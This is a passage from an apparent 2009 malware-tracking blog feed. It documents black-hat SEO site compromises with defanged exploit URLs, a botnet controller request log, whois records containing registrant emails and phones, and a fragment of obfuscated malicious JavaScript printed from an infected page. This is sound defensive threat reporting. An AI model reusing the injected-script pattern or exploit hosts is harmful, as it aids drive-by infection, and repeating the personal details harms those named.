/&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;hxxp://bizoplata.ru/pay.html?&lt;br /&gt;hxxp://bizoplata.ru/ballast.html&lt;br /&gt;hxxp://bizoplata.ru/post.html&lt;br /&gt;hxxp://by.ru/info/?where&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/photo/live/index2.html&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=ecbd15e4abab1929620bc7ce8baa6226&amp;amp;t=1240189400&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Requests: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://utevox.site90.com/f/index.php&lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/photo/live/imagepages/image1.html&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=cf17de61655dcbbe49b2b156a4657ef8&amp;amp;t=1240189397&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;p&gt;Requests: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://analytics-google.info/s/urchin.js&lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/photo/members/imagepages/image1.html&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=af2a41a9e85c52ff2296499b78cacdd7&amp;amp;t=1240189395&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/p&gt;&lt;p&gt;    Requests: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://analytics-google.info/s/urchin.js&lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="441" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="437" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/photo/team/imagepages/image1.html&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=3f78714d6c50cff7fb1bd7cd83ab2101&amp;amp;t=1240189392&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/p&gt;&lt;p&gt;On this page the domain appears to be previously involved in the Asprox malware campaign. As you can see the fgg.js and script.js are still present on the page.&lt;br /&gt;&lt;br /&gt;However all of these are not responding.&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2002" target="_blank"&gt;Finjan report&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.google.com/search?q=%22fgg.js%22&amp;amp;hl=en&amp;amp;rlz=1G1GGLQ_ENBE320&amp;amp;start=10&amp;amp;sa=N" target="_blank"&gt;Google Searchfor fgg.js&lt;/a&gt;&lt;br /&gt;&lt;a href="hxxp://www.google.com/search?source=ig&amp;amp;hl=en&amp;amp;rlz=1G1GGLQ_ENBE320&amp;amp;q=www.netcfg9.ru&amp;amp;btnG=Google+Search&amp;amp;aq=f&amp;amp;oq=" target="_blank"&gt;Google Search for www.netcfg9.ru&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;    hxxp://www.jve4.ru/fgg.js &lt;br /&gt;  hxxp://www.nmr43.ru/fgg.js &lt;br /&gt;  hxxp://www.mj5f.ru/script.js &lt;br /&gt;  hxxp://www.vswc.ru/script.js&lt;br /&gt;  hxxp://www.pkseio.ru/script.js &lt;br /&gt;  hxxp://www.4log-in.ru/script.js &lt;br /&gt;  hxxp://www.netcfg9.ru/script.js &lt;br /&gt;  hxxp://www.sitevgb.ru/script.js&lt;br /&gt;  hxxp://www.errghr.ru/script.js &lt;br /&gt;  hxxp://www.81dns.ru/script.js &lt;br /&gt;  hxxp://mixbunch.cn/thread.html &lt;br /&gt;  hxxp://mixbunch.cn/golf.html&lt;br /&gt;  hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;  hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;  hxxp://mixbunch.cn/bowling.html &lt;br /&gt;  hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;  hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nSxT4TI/AAAAAAAAAaI/9Jy-sUy9QRk/s1600-h/image1.html-Asprox.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 300px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nSxT4TI/AAAAAAAAAaI/9Jy-sUy9QRk/s320/image1.html-Asprox.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698005512053042" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;/p&gt;&lt;p&gt;hxxp://tochtonenado.com/yes/index.php&lt;br /&gt;  hxxp://tochtonenado.com/yes/load.php?stat=Windows&lt;/p&gt;&lt;p&gt;&lt;a href="hxxp://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=bc2e9aa85b7f80634e5b7e5df0e76324&amp;amp;t=1238341867" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Trojan Waledac.GEN&lt;/p&gt;&lt;p&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=19f0382ef717247d4913db3864368582c" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Botnet Controller&lt;/p&gt;&lt;p&gt;  89.149.244.140:80 - [djbobroff.ru] &lt;br /&gt;  Request: GET /spm/index.php?id=584E5E43 &lt;br /&gt;  Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;  Request: GET /spm/index.php?id=584E5E43&amp;amp;download=0000138F &lt;br /&gt;  Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;  Request: POST /spm/index.php?id=584E5E43&amp;amp;mid=5007 &lt;br /&gt;  Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;&lt;br /&gt;  C:\WINDOWS\system32\DRIVERS\asyncmac.sys&lt;br /&gt;&lt;/p&gt;&lt;p&gt;*****************&lt;/p&gt;&lt;p&gt;    Exploits:&lt;br /&gt;&lt;/p&gt;&lt;table width="430" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="269"&gt;hxxp://5rublei.com/unique/index.php&lt;/td&gt;&lt;td width="161"&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=1caa44fb445de12a00abd26402ae5d28&amp;amp;t=1240188306&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/eee1d92f291ebf12eb9a648d5bff3e1c" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=19f0382ef717247d4913db3864368582c" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://bizoplata.ru/ballast.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=19f8e2944f3848c2b9980020300952db&amp;amp;t=1240264005&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://bizoplata.ru/courier.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=93cc42c58cbe763222e43fa8f6375023&amp;amp;t=1239920723&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://bizoplata.ru/pay.html?&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=38182f76de5bcf5d090cdd9b36424d74&amp;amp;t=1240263970&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://bizoplata.ru/post.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&amp;amp;t=1239390474&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://dasretokfin.com/load.php&lt;/td&gt;&lt;td&gt;&lt;a href="http://jsunpack.jeek.org/dec/go?url=dasretokfin.com_load.php" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://mixbunch.cn/thread.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&amp;amp;t=1240199423&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://mixbunch.cn/golf.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=a89ecbd89cd1fd83341ebbfe467dca53&amp;amp;t=1240199761&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://mixbunch.cn/bowling.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=022e3c32f124fd0c0e50939b5399a6f8&amp;amp;t=1240250684&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://peskufex.cn/ss/in.cgi?2&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&amp;amp;t=1239390474&amp;amp;type=js" target="_blank"&gt;Source&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://startdontstop.ru/bigmac.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=add37e12cc791e69d3e0670f58f39901&amp;amp;t=1239890697&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=cea26289df93bc2a5fd52c0d8767305a&amp;amp;t=1240188628" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://sunmaiamibich.ru/pupu/load.php&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/2bab5a949c6e83dba25eb4bda2b90493" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=19f86524a316a29d4e9dfd0d992132ee9" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=8717fc57e750e4948877ea1496eeebe0&amp;amp;t=1240264417&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://tochtonenado.com/yes/index.php &lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=bc2e9aa85b7f80634e5b7e5df0e76324&amp;amp;t=1238341867&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://tochtonenado.com/yes/load.php&lt;/td&gt;&lt;td&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=19f0382ef717247d4913db3864368582c&amp;amp;format=html" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://tochtonenado.com/yes/include/spl.php&lt;/td&gt;&lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=256e6b1f2bb2984111f9a742fc768806&amp;amp;t=1240264874&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://utevox.site90.com/f/index.php&lt;/td&gt;&lt;td&gt;&lt;a href="http://jsunpack.jeek.org/dec/go?url=utevox.site90.com_f_index.php" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://utevox.site90.com/f/load.php&lt;/td&gt;&lt;td&gt;dead&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;br /&gt;  91.212.41.91&lt;br /&gt;&lt;/p&gt;&lt;table width="231" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="231" height="28"&gt;hxxp://&lt;span class="scam_website"&gt;mixbunch.cn&lt;/span&gt;&lt;br /&gt;      hxxp://&lt;span class="scam_website"&gt;sunmaiamibich.ru&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;91.212.65.7&lt;br /&gt;&lt;br /&gt;&lt;table width="231" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="231" height="14"&gt;hxxp://&lt;span class="scam_website"&gt;peskufex.cn&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;95.129.144.228&lt;br /&gt;&lt;br /&gt;&lt;table width="231" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="231" height="42"&gt;hxxp://&lt;span class="scam_website"&gt;5rublei.com&lt;/span&gt;&lt;br /&gt;      hxxp://&lt;span class="scam_website"&gt;dasretokfin.com&lt;/span&gt;&lt;br /&gt;      hxxp://&lt;span class="scam_website"&gt;tochtonenado.com&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;95.129.144.13&lt;br /&gt;&lt;br /&gt;&lt;table width="231" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="231" height="20"&gt;hxxp://&lt;span class="scam_website"&gt;bizoplata.ru&lt;/span&gt;&lt;br /&gt;      hxxp://&lt;span class="scam_website"&gt;startdontstop.ru&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;64.235.52.170&lt;br /&gt;&lt;/p&gt;&lt;table width="231" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="231" height="20"&gt;hxxp://&lt;span class="scam_website"&gt;utevox.site90.com&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;************************&lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;mixbunch.cn&lt;/span&gt;&lt;br /&gt;ROID: 20081108s10001s82359461-cn&lt;br /&gt;Domain Status: clientTransferProhibited&lt;br /&gt;Registrant Organization: Raymond Keaton &lt;br /&gt;Registrant Name: Raymond Keaton&lt;br /&gt;Administrative Email: Keaton@cybernauttech.com&lt;br /&gt;Sponsoring Registrar: 广东时代互联科技有限公司&lt;br /&gt;Name Server:ns1.softwaresupport-group.com&lt;br /&gt;Name Server:ns2.softwaresupport-group.com&lt;br /&gt;Registration Date: 2008-11-08 16:06&lt;br /&gt;Expiration Date: 2009-11-08 16:06&lt;br /&gt;&lt;br /&gt;domain:     &lt;span class="scam_website"&gt;sunmaiamibich.ru&lt;/span&gt;&lt;br /&gt;type:       CORPORATE&lt;br /&gt;nserver:    ns1.softwaresupport-group.com.&lt;br /&gt;nserver:    ns2.softwaresupport-group.com.&lt;br /&gt;state:      REGISTERED, DELEGATED&lt;br /&gt;person:     Private person&lt;br /&gt;phone:      +7 910 3478712&lt;br /&gt;e-mail:     dmitrijstanislavskij@yandex.ru&lt;br /&gt;registrar:  REGRU-REG-RIPN&lt;br /&gt;created:    2009.04.16&lt;br /&gt;paid-till:  2010.04.16&lt;br /&gt;source:     TC-RIPN&lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;peskufex.cn&lt;/span&gt;&lt;br /&gt;ROID: 20090315s10001s50367993-cn&lt;br /&gt;Domain Status: clientDeleteProhibited&lt;br /&gt;Domain Status: clientTransferProhibited&lt;br /&gt;Registrant Organization: 永也进出口公司&lt;br /&gt;Registrant Name: 张龙&lt;br /&gt;Administrative Email: alvin_555@yeah.net&lt;br /&gt;Sponsoring Registrar: 易名中国&lt;br /&gt;Name Server:ns2.dnsmytruedns.com&lt;br /&gt;Name Server:ns1.dnsmytruedns.com&lt;br /&gt;Registration Date: 2009-03-15 15:37&lt;br /&gt;Expiration Date: 2010-03-15 15:37&lt;p&gt;Domain Name: &lt;span class="scam_website"&gt;5rublei.com&lt;/span&gt;&lt;br /&gt;Registrar: BIZCN.COM, INC.&lt;br /&gt;Whois Server: whois.bizcn.com&lt;br /&gt;Referral URL: http://www.bizcn.com&lt;br /&gt;Name Server: NS1.EVERYDNS.NET&lt;br /&gt;Name Server: NS2.EVERYDNS.NET&lt;br /&gt;Name Server: NS3.EVERYDNS.NET&lt;br /&gt;Name Server: NS4.EVERYDNS.NET&lt;br /&gt;Status: clientDeleteProhibited&lt;br /&gt;Status: clientTransferProhibited&lt;br /&gt;Updated Date: 31-mar-2009&lt;br /&gt;Creation Date: 30-jun-2008&lt;br /&gt;Expiration Date: 30-jun-2010&lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;dasretokfin.com&lt;/span&gt;&lt;br /&gt;Registrar: REGTIME LTD.&lt;br /&gt;Whois Server: whois.regtime.net&lt;br /&gt;Referral URL: http://www.webnames.ru&lt;br /&gt;Name Server: NS1.AFRAID.ORG&lt;br /&gt;Name Server: NS2.AFRAID.ORG&lt;br /&gt;Name Server: NS3.AFRAID.ORG&lt;br /&gt;Name Server: NS4.AFRAID.ORG&lt;br /&gt;Status: ok&lt;br /&gt;Updated Date: 24-mar-2009&lt;br /&gt;Creation Date: 18-feb-2009&lt;br /&gt;Expiration Date: 18-feb-2010&lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;tochtonenado.com&lt;/span&gt;&lt;br /&gt;Registrar: UK2 GROUP LTD.&lt;br /&gt;Whois Server: whois.hostingservicesinc.net&lt;br /&gt;Referral URL: http://www.uk2group.com/&lt;br /&gt;Name Server: NS1.EVERYDNS.NET&lt;br /&gt;Name Server: NS2.EVERYDNS.NET&lt;br /&gt;Name Server: NS3.EVERYDNS.NET&lt;br /&gt;Name Server: NS4.EVERYDNS.NET&lt;br /&gt;Status: clientTransferProhibited&lt;br /&gt;Updated Date: 25-mar-2009&lt;br /&gt;Creation Date: 25-mar-2009&lt;br /&gt;Expiration Date: 25-mar-2010&lt;br /&gt;&lt;br /&gt;domain: &lt;span class="scam_website"&gt;bizoplata.ru&lt;/span&gt;&lt;br /&gt;type:       CORPORATE&lt;br /&gt;nserver:    ns1.sevensearchon.ru&lt;br /&gt;nserver:    ns2.sevensearchon.ru&lt;br /&gt;state:      REGISTERED, DELEGATED&lt;br /&gt;person:     Private Person&lt;br /&gt;phone:      +7 495 0000000&lt;br /&gt;e-mail:     tuhov83@mail.ru&lt;br /&gt;registrar:  CT-REG-RIPN&lt;br /&gt;created:    2009.01.23&lt;br /&gt;paid-till:  2010.01.23&lt;br /&gt;source:     TC-RIPN&lt;br /&gt;&lt;br /&gt;domain:     &lt;span class="scam_website"&gt;startdontstop.ru&lt;/span&gt;&lt;br /&gt;type:       CORPORATE&lt;br /&gt;nserver:    ns1.sevensearchon.ru.&lt;br /&gt;nserver:    ns2.sevensearchon.ru.&lt;br /&gt;state:      REGISTERED, DELEGATED&lt;br /&gt;person:     Private Person&lt;br /&gt;phone:      +7 916 7843219&lt;br /&gt;e-mail:     ale32888049@yandex.ru&lt;br /&gt;registrar:  NAUNET-REG-RIPN&lt;br /&gt;created:    2009.04.14&lt;br /&gt;paid-till:  2010.04.14&lt;br /&gt;source:     TC-RIPN&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-3244632093602359334?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/3244632093602359334'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/3244632093602359334'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p4.html' title='Black Hat SEO - RBN Hacks, p.4'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EVczvmI/AAAAAAAAAY4/DGUFqQzpfe0/s72-c/default2.html.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-4182474953384058765</id><published>2009-04-17T10:15:00.000-07:00</published><updated>2009-04-19T14:14:40.949-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='Eurohost LLC'/><category scheme='http://www.blogger.com/atom/ns#' term='rbn'/><category scheme='http://www.blogger.com/atom/ns#' term='clarafin-info'/><category scheme='http://www.blogger.com/atom/ns#' term='pdf malware'/><category scheme='http://www.blogger.com/atom/ns#' term='javascript exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe trojans'/><title type='text'>Black Hat SEO - RBN Hacks, p.3</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="502" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO, exploits, hacks, botnets&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; Triple threats&lt;br /&gt;&lt;/p&gt;&lt;table width="488" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="488"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;WARNING&lt;/b&gt;: All sites listed on this page are dangerous (live URL with exploits) &lt;br /&gt; which lead  to trojans beeing automatically installed on your computer.&lt;br /&gt;Do NOT visit them unless you know what you are doing. &lt;br /&gt;(only links are safe)&lt;br /&gt;&lt;p&gt;The story about &lt;i&gt;&amp;quot;Hosted JavaScript leading to .cn PDF Malware&amp;quot;&lt;/i&gt; which has implicated &lt;span class="scam_website"&gt;clarafin[.]info&lt;/span&gt;, &lt;span class="scam_website"&gt;fabiomotor[.]cn&lt;/span&gt; and &lt;span class="scam_website"&gt;letomerin[.]cn&lt;/span&gt; continue!&lt;br /&gt;  &lt;br /&gt;New sites appear as  intermediaries for distributing malware.&lt;br /&gt;&lt;hr /&gt;About &lt;span class="scam_website"&gt;beebest[.]cn&lt;/span&gt; I will take this domain for example &amp;quot;cmizziconstruction.com&amp;quot;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=cmizziconstruction.com" target="_blank"&gt;The Diagnostic page for cmizziconstruction.com&lt;/a&gt;. (Provided by Google Safe Browsing)&lt;br /&gt;&lt;br /&gt;  In the source code we can see:&lt;br /&gt;&lt;br /&gt;&lt;table width="206" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"&gt;&lt;tr&gt;&lt;td width="10544" height="404" style="padding:10px"&gt;&amp;lt;script&amp;gt;function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d&lt;br /&gt;2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534()&lt;br /&gt;));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){&lt;br /&gt;var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49&lt;br /&gt;d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43&amp;lt;&lt;br /&gt;h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647&lt;br /&gt;24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst&lt;br /&gt;r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36=''&lt;br /&gt;;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628&lt;br /&gt;216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+&lt;br 